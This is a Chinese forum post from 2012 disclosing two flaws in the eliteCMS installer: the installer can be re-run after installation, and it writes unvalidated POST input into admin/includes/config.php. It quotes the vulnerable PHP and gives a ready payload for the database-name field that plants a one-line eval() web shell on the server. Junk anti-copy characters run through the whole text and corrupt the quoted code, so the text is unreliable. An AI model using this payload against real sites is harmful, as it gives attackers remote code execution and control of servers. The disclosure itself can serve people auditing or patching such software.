eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装- B: \' K K, O3 C: Q
1 z8 j/ _( f, y+ ?# o: o9 L1 ^# C* \另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php8 v6 Q9 S! V! N3 M4 Y7 G; Z
我们来看代码:
* T6 @& M3 b, G! P8 {6 X' K # q) v: A3 ]* ?( `& B
...
U* v4 |6 a9 }( U5 }elseif ($_GET['step'] == "4") {
6 F" D4 r& l. w1 P- }$ ~3 u+ f3 f $file = "../admin/includes/config.php";: m0 s, }6 t1 q: N$ s: a
$write = "<?php\n";5 j/ P( V8 m7 _8 _
$write .= "/**\n";
4 G! \9 y. l! r/ M' s2 U# C& J $write .= "*\n";
% k7 f- u) L. t1 i% j* g" S3 l $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";( H6 K& B- n& h0 M
...略...; O" k3 o; p6 i& a
$write .= "*\n";
+ L& T- N2 [+ N# G$ ?+ M $write .= "*/\n";) N! c5 ?6 m) A# L6 s, j
$write .= "\n";
5 E) [) v- h5 C2 S $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
( g2 |2 H9 ~% a9 U. h D5 U9 B; J $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
( r; E( R4 F+ j4 A7 U) d F $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
" Y- k; b+ Q/ i4 [6 P $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
8 Q$ o+ D4 L$ M+ X, H- ^1 O $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";, p2 l1 k* @. ] x% B" q0 ^1 B
$write .= "if (!\$connection) {\n";3 _/ p' f$ p p% p7 N
$write .= " die(\"Database connection failed\" .mysql_error());\n";& N4 O- W6 t# j) q' w. p: b' B
$write .= " \n";# }! {% [9 D# X! v* Z
$write .= "} \n";
# A" L4 Z: i2 Y) G $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
5 x. Z, ~: ^5 ~% E) H3 | $write .= "if (!\$db_select) {\n";. D, k! m8 v! |0 F+ f
$write .= " die(\"Database select failed\" .mysql_error());\n"; ~1 g, { ^9 U) a$ ]
$write .= " \n";
; h0 X, H6 b% q- p% \ $write .= "} \n";( f' l/ B2 W3 g: O8 ~
$write .= "?>\n";
5 D# z- v8 t# T+ ~& I2 t1 f 3 N" Z j- `" K: v' F
$writer = fopen($file, 'w');0 E( X" |2 T+ D0 {
...) l, y9 N4 v- q; m2 z% Q. R C
# r3 T( p* E. n7 ^& j
在看代码:
% A* E: I& ^7 e! t' l/ P 4 `, L1 r) u8 ^& F; ^7 y
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
/ L2 Z9 ~2 f) s! g% i2 G$_SESSION['DB_NAME'] = $_POST['DB_NAME'];5 v0 P: C4 z+ J% u$ w" F
$_SESSION['DB_USER'] = $_POST['DB_USER'];
% o5 c S9 [! B$ J$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
( i4 a; j6 P0 |9 h8 h 2 u% Q& K6 ?) y# X- K
取值未作任何验证
- n+ v1 \: Z- y2 p. o$ e# ]& x如果将数据库名POST数据:5 Z/ w; T/ o$ L! H4 y0 Z; [, B
. P1 r" P$ ?. R) ]% [7 M"?><?php eval($_POST[c]);?><?php' Y2 c& h: v5 {5 F7 E% x# s
/ z& R) E$ \+ K' X( I; Q, p) m
将导致一句话后门写入/admin/includes/config.php1 z( r! [7 o, N) J% D; M2 Q, {
|
发表于 2012-11-18 13:59:27
收藏
支持
反对